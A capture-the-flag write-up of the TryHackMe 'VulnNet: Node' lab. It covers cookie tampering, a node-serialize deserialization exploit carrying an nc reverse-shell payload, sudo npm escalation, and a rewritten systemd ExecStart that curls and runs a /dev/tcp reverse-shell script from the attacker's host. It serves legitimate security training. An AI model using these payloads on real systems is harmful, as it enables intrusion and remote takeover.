TryHackMe:VulnNet: Node

Al1z4deh:~# echo "Welcome"
4 min read · Jun 8, 2022


Today we will take a look at TryHackMe: VulnNet: Node. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes.

  • Network scan
sudo nmap -p- -sCV --open 10.10.41.219

PORT     STATE SERVICE VERSION
8080/tcp open  http    Node.js Express framework
|_http-title: VulnNet – Your reliable news source – Try Now!
|_http-open-proxy: Proxy might be redirecting requests

A full port scan shows only 8080/tcp open, serving a Node.js Express application.
  • Web

When we first open the page, it greets us as a guest.

Let’s refresh the page and catch the request with Burp Suite.

Looking at the request, we see that the site sets a cookie. Let’s decode it and look at the contents.

URL-decode → Base64-decode

The decoded value shows that it marks us as a guest. Replace the username with admin and send the request again.

The response is now “Welcome Admin”, so the greeting is based purely on the client-controlled cookie. But when we try to log in, it still asks for a password.

When I changed the cookie to an unexpected value, I received an error response instead.

I pasted the error message into Google and found an article describing the issue.

It’s time to get a reverse shell.

  • Reverse Shell

The `_$$ND_FUNC$$_` prefix in the payload below is the marker node-serialize uses for serialized functions: when the server unserializes the cookie, any string value starting with that marker is passed to eval(), and the trailing `()` turns the function into an IIFE, so the command runs as the web user as soon as the request is processed. Replace $IP with your listener address:

{"username":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()","isAdmin":true,"encoding": "utf-8"}

Base64-encode the JSON, URL-encode the result, set it as the cookie value and send the request.

Listen:

Command: nc -nvlp 4444

  • serv-manage

After getting the shell, upgrade it to a proper TTY and check sudo rights:

Command: script /dev/null -c bash
Command: export TERM=xterm
Ctrl + Z
Command: stty raw -echo ; fg
Command: reset

www@vulnnet-node:~/VulnNet-Node$ sudo -l
Matching Defaults entries for www on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www may run the following commands on vulnnet-node:
(serv-manage) NOPASSWD: /usr/bin/npm
www can run npm as serv-manage without a password. npm executes the lifecycle scripts in package.json, so installing a package whose preinstall script is /bin/bash gives us a shell as serv-manage (--unsafe-perm suppresses npm's UID/GID switching when it runs package scripts):

www@vulnnet-node:~/VulnNet-Node$ mkdir exploit
www@vulnnet-node:~/VulnNet-Node$ echo '{"scripts": {"preinstall": "/bin/bash"}}' > exploit/package.json
www@vulnnet-node:~/VulnNet-Node$ sudo -u serv-manage npm -C exploit --unsafe-perm i
  • Root
serv-manage@vulnnet-node:/home/www/VulnNet-Node/exploit$ sudo -l
Matching Defaults entries for serv-manage on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User serv-manage may run the following commands on vulnnet-node:
(root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl daemon-reload
serv-manage@vulnnet-node: locate vulnnet-auto.timer
serv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-auto.timer
--------------------------------
[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/30
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target
--------------------------------
serv-manage@vulnnet-node: locate vulnnet-job.service
serv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-job.service
---------------------------------
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/df

[Install]
WantedBy=multi-user.target
---------------------------------

The interesting line is “ExecStart=/bin/df”. The timer starts vulnnet-job.service, and whatever ExecStart points to runs as root. sudo lets serv-manage stop and start that timer (and run daemon-reload), so if the service file under /etc/systemd/system is writable by serv-manage (check its permissions with ls -l before editing), we can replace the command with a reverse shell and have root run it for us.

First, let’s prepare a payload on our own machine.

Exploit.sh

$ nano exploit.sh
#!/bin/bash
bash -i >& /dev/tcp/Your_IP/4242 0>&1

Serve it over HTTP:

Command: python3 -m http.server 80

On the target machine, edit /etc/systemd/system/vulnnet-job.service and change the ExecStart line so that it fetches and runs the script:

ExecStart=/bin/bash -c "curl http://Your_IP/exploit.sh | bash"

Local machine:

Command: nc -nvlp 4242

On the target machine, reload systemd so it picks up the modified unit (daemon-reload is one of the allowed commands), then stop and start the timer. Because OnBootSec=0min has already elapsed, starting the timer fires vulnnet-job.service immediately, and root runs our new ExecStart:

serv-manage@vulnnet-node: sudo -u root /bin/systemctl daemon-reload
serv-manage@vulnnet-node: sudo -u root /bin/systemctl stop vulnnet-auto.timer
serv-manage@vulnnet-node: sudo -u root /bin/systemctl start vulnnet-auto.timer

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Al1z4deh:~# echo "eJPT, CEH, OSCP"